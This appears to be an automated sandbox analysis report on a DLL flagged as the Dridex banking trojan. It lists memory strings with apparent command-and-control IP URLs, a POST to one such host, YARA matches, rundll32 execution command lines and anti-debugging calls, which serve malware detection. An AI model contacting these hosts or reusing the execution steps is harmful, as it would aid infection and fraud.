                      Source: loaddll32.exe, 00000000.00000003.1102121755.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/k
                      Source: loaddll32.exe, 00000000.00000003.1084086671.00000000008DE000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.882972494.00000000008DE000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.883045834.0000000000FED000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/l
                      Source: loaddll32.exe, 00000000.00000003.854569663.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/l:
                      Source: rundll32.exe, 00000003.00000003.883164157.0000000000F88000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/la
                      Source: loaddll32.exe, 00000000.00000003.1009429682.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/ll
                      Source: rundll32.exe, 00000003.00000003.838578926.0000000000F88000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/lpA
                      Source: loaddll32.exe, 00000000.00000003.1001114476.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/o
                      Source: loaddll32.exe, 00000000.00000002.1188425853.00000000008DE000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000003.901239497.0000000000F88000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.1052138868.0000000000F88000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.883164157.0000000000F88000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/oft
                      Source: loaddll32.exe, 00000000.00000003.909375462.0000000000951000.00000004.00000001.sdmpString found in binary or memory: https://182.46.210.220/
                      Source: rundll32.exe, 00000003.00000003.901239497.0000000000F88000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47/
                      Source: rundll32.exe, 00000003.00000003.901239497.0000000000F88000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47/versal
                      Source: loaddll32.exe, 00000000.00000003.807020733.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:
                      Source: loaddll32.exe, 00000000.00000003.1084086671.00000000008DE000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.1185809780.0000000000FED000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/
                      Source: loaddll32.exe, 00000000.00000003.1127362988.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/0
                      Source: loaddll32.exe, 00000000.00000003.1017606590.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/4853
                      Source: rundll32.exe, 00000003.00000003.883094862.0000000001001000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/61
                      Source: loaddll32.exe, 00000000.00000003.1001114476.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/853
                      Source: loaddll32.exe, 00000000.00000003.866464673.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/D
                      Source: loaddll32.exe, 00000000.00000003.1127362988.00000000008DE000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1017606590.00000000008DE000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1059602410.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/ES
                      Source: rundll32.exe, 00000003.00000003.883094862.0000000001001000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/N1
                      Source: loaddll32.exe, 00000000.00000003.840550486.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/P
                      Source: loaddll32.exe, 00000000.00000003.1084086671.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/_
                      Source: loaddll32.exe, 00000000.00000003.807020733.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/ertificate
                      Source: loaddll32.exe, 00000000.00000003.1127362988.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/soft
                      Source: loaddll32.exe, 00000000.00000003.935924699.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/th:
                      Source: rundll32.exe, 00000003.00000003.901239497.0000000000F88000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.1052138868.0000000000F88000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/
                      Source: loaddll32.exe, 00000000.00000003.1017606590.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/#S
                      Source: rundll32.exe, 00000003.00000003.838578926.0000000000F88000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/)A
                      Source: loaddll32.exe, 00000000.00000003.1059602410.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220//S
                      Source: loaddll32.exe, 00000000.00000003.1084086671.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/0
                      Source: loaddll32.exe, 00000000.00000003.1084086671.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/131208120000Z
                      Source: loaddll32.exe, 00000000.00000003.1001114476.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/3S
                      Source: loaddll32.exe, 00000000.00000003.1084086671.00000000008DE000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.1197121469.00000000053DA000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/7.0.96:6891/
                      Source: loaddll32.exe, 00000000.00000003.1059602410.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/7.0.96:6891/Microsoft
                      Source: loaddll32.exe, 00000000.00000003.1075937158.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/9
                      Source: loaddll32.exe, 00000000.00000003.1102121755.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/?S
                      Source: loaddll32.exe, 00000000.00000003.1084086671.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/A
                      Source: rundll32.exe, 00000003.00000003.838578926.0000000000F88000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/B
                      Source: loaddll32.exe, 00000000.00000003.1059602410.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/C
                      Source: loaddll32.exe, 00000000.00000003.1084086671.00000000008DE000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.901239497.0000000000F88000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.1140521108.0000000000F88000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/Certification
                      Source: rundll32.exe, 00000003.00000003.1052138868.0000000000F88000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/Ezi
                      Source: rundll32.exe, 00000003.00000003.838578926.0000000000F88000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/FB
                      Source: rundll32.exe, 00000003.00000003.1140521108.0000000000F88000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/GlobalSign
                      Source: loaddll32.exe, 00000000.00000003.1127362988.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/K
                      Source: loaddll32.exe, 00000000.00000003.1084086671.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/L
                      Source: loaddll32.exe, 00000000.00000003.968382986.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/O
                      Source: loaddll32.exe, 00000000.00000003.1127362988.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/O.
                      Source: rundll32.exe, 00000003.00000003.901239497.0000000000F88000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/P
                      Source: loaddll32.exe, 00000000.00000003.1102121755.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/S
                      Source: loaddll32.exe, 00000000.00000003.1084086671.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/T
                      Source: rundll32.exe, 00000003.00000003.1022657707.0000000000F88000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/TB
                      Source: loaddll32.exe, 00000000.00000003.1084086671.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/U
                      Source: loaddll32.exe, 00000000.00000002.1188425853.00000000008DE000.00000004.00000020.sdmpString found in binary or memory: https://192.46.210.220/W
                      Source: loaddll32.exe, 00000000.00000003.1127362988.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/X
                      Source: loaddll32.exe, 00000000.00000002.1188425853.00000000008DE000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000003.1179012306.0000000000F88000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/aenh.dll
                      Source: rundll32.exe, 00000003.00000003.838578926.0000000000F88000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/cB
                      Source: rundll32.exe, 00000003.00000002.1185787218.0000000000F88000.00000004.00000020.sdmpString found in binary or memory: https://192.46.210.220/coro8
                      Source: loaddll32.exe, 00000000.00000003.1084086671.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/ign.net/root-r2.crl0
                      Source: loaddll32.exe, 00000000.00000003.968382986.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/k
                      Source: rundll32.exe, 00000003.00000003.838578926.0000000000F88000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/lB
                      Source: loaddll32.exe, 00000000.00000003.935924699.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/o
                      Source: loaddll32.exe, 00000000.00000003.1102121755.00000000008DE000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.917483761.00000000008DE000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1017606590.00000000008DE000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1059602410.00000000008DE000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.1197121469.00000000053DA000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/ography
                      Source: rundll32.exe, 00000003.00000003.901239497.0000000000F88000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/qB
                      Source: loaddll32.exe, 00000000.00000003.1092536286.00000000008DE000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.882972494.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/r
                      Source: loaddll32.exe, 00000000.00000003.1084086671.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/s
                      Source: loaddll32.exe, 00000000.00000003.1075937158.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/w
                      Source: loaddll32.exe, 00000000.00000003.1084086671.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/z
                      Source: rundll32.exe, 00000003.00000003.838578926.0000000000F88000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/zB
                      Source: loaddll32.exe, 00000000.00000003.1084086671.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96/
                      Source: loaddll32.exe, 00000000.00000003.807020733.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96/7
                      Source: loaddll32.exe, 00000000.00000003.1084086671.00000000008DE000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.935924699.00000000008DE000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.883094862.0000000001001000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/
                      Source: loaddll32.exe, 00000000.00000003.1075937158.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/.0.96:6891/
                      Source: loaddll32.exe, 00000000.00000002.1188425853.00000000008DE000.00000004.00000020.sdmp, loaddll32.exe, 00000000.00000003.1143809099.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/.0.96:6891/Microsoft
                      Source: loaddll32.exe, 00000000.00000003.854675981.0000000000921000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/14P
                      Source: loaddll32.exe, 00000000.00000003.1051157113.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/4F
                      Source: rundll32.exe, 00000003.00000002.1197121469.00000000053DA000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/9
                      Source: loaddll32.exe, 00000000.00000003.1127362988.00000000008DE000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.917483761.00000000008DE000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1017606590.00000000008DE000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.840550486.00000000008DE000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.1197121469.00000000053DA000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/Microsoft
                      Source: rundll32.exe, 00000003.00000003.883094862.0000000001001000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/V1
                      Source: loaddll32.exe, 00000000.00000003.854569663.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/der
                      Source: loaddll32.exe, 00000000.00000003.1084086671.00000000008DE000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1127362988.00000000008DE000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.917483761.00000000008DE000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.1197121469.00000000053DA000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/graphy
                      Source: loaddll32.exe, 00000000.00000003.854675981.0000000000921000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/h.dll
                      Source: loaddll32.exe, 00000000.00000003.1084086671.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/o
                      Source: loaddll32.exe, 00000000.00000003.917483761.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/rF%
                      Source: loaddll32.exe, 00000000.00000003.854569663.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/w
                      Source: loaddll32.exe, 00000000.00000003.1102121755.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://452.46.210.220/
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3E39F9 InternetReadFile,
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.4:49779 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.4:49783 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.4:50217 version: TLS 1.2
                      Source: loaddll32.exe, 00000000.00000002.1188237515.000000000086B000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      E-Banking Fraud:

                      barindex
                      Yara detected Dridex unpacked fileShow sources
                      Source: Yara matchFile source: 4.3.rundll32.exe.4c2db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.a6db55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.496db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6e3b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4a9db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.79db55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.a6db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4c2db55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.79db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4a9db55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.496db55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e3b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000003.779089612.0000000004C10000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1194485552.000000006E3B1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.784553860.0000000000780000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1197217588.000000006E3B1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.752228800.0000000004950000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.753234936.0000000004A80000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.785852075.0000000000A50000.00000040.00000001.sdmp, type: MEMORY
                      Detected Dridex e-Banking trojanShow sources
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3B51A7 OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,
                      Source: SecuriteInfo.com.Variant.Razy.980776.25006.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3C67C8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3D0220
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3DD620
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3BCA10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3DFA10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3B9E70
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3C9E70
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3CA660
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3D7660
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3D2E60
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3D1240
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3C8AB0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3D26B0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3D1EB0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3CAE80
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3C8EF0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3CB6F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3D62F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3CF6E0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3B6AD0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3C96D0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3DFA10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3D3EC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3D1730
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3D9B10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3D3B00
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3C5B60
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3CBF50
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3CE3F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3C83C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3C7FC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3D7FC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3CD030
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3D1020
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3D5CB0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3CE0A0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3D4CA0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3D50A0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3DDCA0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3C98DA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3BACD0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3CA0D0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3C88C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3C8CC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3B1570
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3C7564
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3BF9A0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3CC590
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3CD980
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3DD180
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3D89F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3D71F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3CFDD0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E3FE210
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3C22A0 NtDelayExecution,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3DBE30 NtClose,
                      Source: SecuriteInfo.com.Variant.Razy.980776.25006.dllVirustotal: Detection: 9%
                      Source: SecuriteInfo.com.Variant.Razy.980776.25006.dllReversingLabs: Detection: 39%
                      Source: SecuriteInfo.com.Variant.Razy.980776.25006.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.25006.dll'
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.25006.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.25006.dll,Bluewing
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.25006.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.25006.dll,Earth
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.25006.dll,Masterjust
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.25006.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.25006.dll,Bluewing
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.25006.dll,Earth
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.25006.dll,Masterjust
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.25006.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                      Source: classification engineClassification label: mal84.bank.troj.evad.winDLL@11/2@0/5
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.25006.dll,Bluewing
                      Source: SecuriteInfo.com.Variant.Razy.980776.25006.28161Joe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: SecuriteInfo.com.Variant.Razy.980776.25006.dllStatic file information: File size 1375232 > 1048576
                      Source: SecuriteInfo.com.Variant.Razy.980776.25006.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: SecuriteInfo.com.Variant.Razy.980776.25006.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: c:\Gun\208-town\521\exa\botto\party.pdb source: loaddll32.exe, 00000000.00000002.1208261330.000000006E477000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1199733251.000000006E477000.00000002.00020000.sdmp, SecuriteInfo.com.Variant.Razy.980776.25006.dll
                      Source: C:\Windows\System32\loaddll32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\loaddll32.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                      Source: C:\Windows\System32\loaddll32.exeCode function: OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3C3930 GetTokenInformation,GetTokenInformation,GetSystemInfo,GetTokenInformation,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3DCEF8 FindFirstFileExW,
                      Source: loaddll32.exe, 00000000.00000002.1188409353.00000000008CF000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4297B0 IsDebuggerPresent,IsDebuggerPresent,CreateThread,std::_Timevec::_Timevec,WaitForSingleObjectEx,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E428B60 __invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__strftime_l,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__cftoe,__aligned_msize,__invoke_watson_if_error,GetFileType,WriteConsoleW,GetLastError,__cftoe,WriteFile,WriteFile,OutputDebugStringW,__invoke_watson_if_error,__CrtDbgReportWV,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4247C0 mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4FBA72 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4FB64D push dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4FB942 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3C6C50 KiUserExceptionDispatcher,LdrLoadDll,
